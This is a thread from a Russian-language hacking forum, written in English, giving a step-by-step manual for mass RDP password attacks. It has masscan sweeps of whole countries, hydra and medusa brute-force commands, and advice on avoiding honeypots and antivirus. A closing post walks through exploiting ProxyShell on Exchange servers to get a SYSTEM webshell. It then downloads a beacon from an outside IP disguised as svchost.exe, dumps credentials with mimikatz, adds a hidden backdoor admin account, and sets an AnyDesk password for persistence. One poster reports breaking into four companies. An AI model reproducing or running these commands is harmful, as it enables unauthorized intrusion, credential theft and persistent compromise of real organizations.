• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга RDP attack

Отслеживать
Prokhorenco

Prokhorenco

(L3) cache
Пользователь
Регистрация
18.02.2023
Сообщения
192
Реакции
305
A method for simple Remote Desktop (RDP) password attack.

Download passwords:
Bash: 
git clone https://github.com/danielmiessler/SecLists.git

Output all usernames into one file:
Bash: 
find SecLists/Usernames/ -type f -exec cat {} + > usernames.txt

Output all passwords into one file:
Bash: 
find SecLists/Passwords/ -type f -exec cat {} + > passwords.txt

Scan for RDP:
Bash: 
sudo masscan -Pn -sS -iL ranges.txt --rate 6000 -p3389 --open-only --excludefile block.txt | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > targets.txt

Password attack:
Bash: 
hydra -L usernames.txt -P passwords.txt -M targets.txt -t 16 rdp -o results

ranges.txt: https://lite.ip2location.com/ip-address-ranges-by-country
block.txt: https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2
 
Usually i use "./masscan -iL list.txt -p 3389 --exclude 1.2.3.4 --rate 400000 -oG 3389.txt --open" , scan server die in few hours .
I will use with block.txt to see what happen , but your rate --rate 6000 is not small ?

And i want test this :
nmap -iL ranges.txt -Pn -n --open -p3389 --script-timeout 20s --script=rdp-vuln-ms12-020,rdp-enum-encryption,rdp-ntlm-info --min-hostgroup 100 -g 53 --scan-delay 5 > targets.txt

Internal scans: set to 88 for Kerberos
External scans: set to 53 for DNS
Delay 0-5
 
Sec13B сказал(а):
Usually i use "./masscan -iL list.txt -p 3389 --exclude 1.2.3.4 --rate 400000 -oG 3389.txt --open" , scan server die in few hours .
I will use with block.txt to see what happen , but your rate --rate 6000 is not small ?

And i want test this :
nmap -iL ranges.txt -Pn -n --open -p3389 --script-timeout 20s --script=rdp-vuln-ms12-020,rdp-enum-encryption,rdp-ntlm-info --min-hostgroup 100 -g 53 --scan-delay 5 > targets.txt

Internal scans: set to 88 for Kerberos
External scans: set to 53 for DNS
Delay 0-5
Im finding that medusa [1] works better for me than hydra. Yes 6000 is small but its only for example, change it as you see fit.

[1] https://www.kali.org/tools/medusa

Bash: 
medusa -U usernames.txt -P passwords.txt -H targets.txt -M rdp -O results.txt
block.txt is meant to block known honeypot IP ranges. Won't cover everything though.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Kane сказал(а):
Can hydra or medusa give some best result then nlbrute or z668?
For me hydra is the best for that
 
athena3 сказал(а):
So, after getting some number of valid pairs of creds, what post exp. framework/tool you can suggest? Thanks.
I like PoshC2. The command and control framework is great and easy to run on a VPS and very easy to proxy, plus its free. But (like most Open Source C2s) the default implants are trash. You can find some cryptors or use stuff like Unicorn etc etc but most AV will spot it. Better off writing your own implant that you can command and control from posh.
 
InfoHydra сказал(а):
I like PoshC2. The command and control framework is great and easy to run on a VPS and very easy to proxy, plus its free. But (like most Open Source C2s) the default implants are trash. You can find some cryptors or use stuff like Unicorn etc etc but most AV will spot it. Better off writing your own implant that you can command and control from posh.
Got it, thanks mates for suggestions and links with postexp tools.
I've tried to use Havoc and was not so lucky with that framework (during creating a new payload I'm getting the error message with x64 compiler, even on all my environments x64, arm m1). So will cheank other ones.

Btw, to find ip ranges with that ip2locaton service (which the topic starter had mentioned) I've created some step by step biref manual, hopefully will be usefull to somebody:
1. Go and login/signup to http://lite.ip2location.com/ip-address-ranges-by-country and select desired country
2. Download IP2LOCATION-LITE-DB1.CSV.ZIP file (and yeah, it includes all countries)
3. Let's visit the github
git clone https://github.com/ip2location-python-csv-converter
4. move to downloaded local directory
5. install one python dependant module (ippaddress I belive)
6. execute python ip2location-csv-converter.py -cidr -append IP2LOCATION-LITE-DB1.CSV IP2LOCATION-CIDR.CSV
7. Now let's create the only list with your to-audit country using awk
cat IP2LOCATION-CIDR.CSV | grep India | awk -F ',' '{print $3}' | tr -d '"' > ip_range_India.txt

I know this is pretty obvious, so don't blame to much, I've spent at least more than 40 min to get it, and starting to use it.

peace to everyone
 
how u can split one file (all.txt) with 20499504 ips in multiple files like file1.txt file2.txt etc.
i use : "split all.txt -l 5" and result is below:
xzzziqazn xzzzhtspb xzzzgxkhy xzzzgbcaa xzzzfetrb xzzzeilly xzzzdmddt xzzzcpuul xzzzbtmmr xzzzaxecw xzzzaavvd xzzdnmz

du -sh ~/now/
19G /root/now/
 
Sec13B сказал(а):
how u can split one file (all.txt) with 20499504 ips in multiple files like file1.txt file2.txt etc.
i use : "split all.txt -l 5" and result is below:
xzzziqazn xzzzhtspb xzzzgxkhy xzzzgbcaa xzzzfetrb xzzzeilly xzzzdmddt xzzzcpuul xzzzbtmmr xzzzaxecw xzzzaavvd xzzdnmz

du -sh ~/now/
19G /root/now/
split all.txt -l 5 -d file --additional-suffix '.txt'
 
athena3 сказал(а):
Got it, thanks mates for suggestions and links with postexp tools.
I've tried to use Havoc and was not so lucky with that framework (during creating a new payload I'm getting the error message with x64 compiler, even on all my environments x64, arm m1). So will cheank other ones.

Btw, to find ip ranges with that ip2locaton service (which the topic starter had mentioned) I've created some step by step biref manual, hopefully will be usefull to somebody:
1. Go and login/signup to http://lite.ip2location.com/ip-address-ranges-by-country and select desired country
2. Download IP2LOCATION-LITE-DB1.CSV.ZIP file (and yeah, it includes all countries)
3. Let's visit the github
git clone https://github.com/ip2location-python-csv-converter
4. move to downloaded local directory
5. install one python dependant module (ippaddress I belive)
6. execute python ip2location-csv-converter.py -cidr -append IP2LOCATION-LITE-DB1.CSV IP2LOCATION-CIDR.CSV
7. Now let's create the only list with your to-audit country using awk
cat IP2LOCATION-CIDR.CSV | grep India | awk -F ',' '{print $3}' | tr -d '"' > ip_range_India.txt

I know this is pretty obvious, so don't blame to much, I've spent at least more than 40 min to get it, and starting to use it.

peace to everyone
I just copy and paste, remove the noise and add '-' to the CIDR ranges. See my example for Chinese IP ranges: https://pastebin.com/raw/8Rke96BE
 

Вложения

  • china.txt
    114.2 КБ · Просмотры: 65
nope, it still works there is so many rdp's deployed with simple password's that created during testing time, only issue is from number of rdp's you get how to find valuable servers, i followed authors cve-2021-34473 article, i recreated it for SEA region i got access in to 4 valid crops but i still trying to figure out what to do with all access, these threads very helpful for ppl liek me who just starting on network pen esting
 
mrx325 сказал(а):
nope, it still works there is so many rdp's deployed with simple password's that created during testing time, only issue is from number of rdp's you get how to find valuable servers, i followed authors cve-2021-34473 article, i recreated it for SEA region i got access in to 4 valid crops but i still trying to figure out what to do with all access, these threads very helpful for ppl liek me who just starting on network pen esting
Gain initial access with CVE-2021-34473.
Код: 
user@host:~$ python3 proxyshell-auto/proxyshell.py -t 10.10.10.11
fqdn srvexchange2016.domain.local
+ Administrator@domain.com
legacyDN /o=COMPANY/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=cc84dab2b5f8407ea1545e2f024382aa-Administrator
leak_sid S-1-5-21-654894352-2732664023-2722231124-500
token VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBxBZG1pbmlzdHJhdGV1ckBwZWNoZXhwb3J0Lm1nVSxTLTEtNS0yMS02NTQ4OTQzNTItMjczMjY2NDAyMy0yNzIyMjMxMTI0LTUwMEcBAAAABwAAAAxTLTEtNS0zMi01NDRFAAAAAA==
set_ews Success with subject grvshwaveotkomvc
write webshell at aspnet_client/yhuzv.asPx
<Response [404]>
nt authority\system
SHELL>
Now you have a shell throw a beacon into the network.
Код: 
powershell.exe Invoke-WebRequest -Uri "http://198.42.135.87:8000/beacon.exe" -OutFile "C:\windows\TEMP\svchost.exe"
Now run the beacon.
Код: 
powershell.exe "C:\windows\TEMP\svchost.exe"

Now you have a beacon on someones exchange server. From here i like to run sekurlsa::logonpasswords and lsadump::sam using mimikatz. I often find the domain admin credentials like this, i then start spraying these credentials on all network shares to see where else i can move to and access using SoftPerfect Network Scanner.

Sometimes you will see the company using AnyDesk so you can do.
Set your AnyDesk password.
Код: 
cmd.exe /c echo skalfhgd63iAPE | C:\ProgramData\AnyDesk\AnyDesk.exe --set-password
Create local user and hide its folder in properties.
Код: 
net user oldadmin "skalfhgd63iAPE" /add
net localgroup Administrator oldadmin /ADD
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadmin /t REG_DWORD /d 0 /f
Fetch AnyDesk ID and connect.
Код: 
cmd.exe /c C:\ProgramData\AnyDesk\AnyDesk.exe --get-id

GitHub - Udyz/proxyshell-auto: Automatic ProxyShell Exploit

Automatic ProxyShell Exploit. Contribute to Udyz/proxyshell-auto development by creating an account on GitHub.
github.com

Very basic example.
 
Последнее редактирование:
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх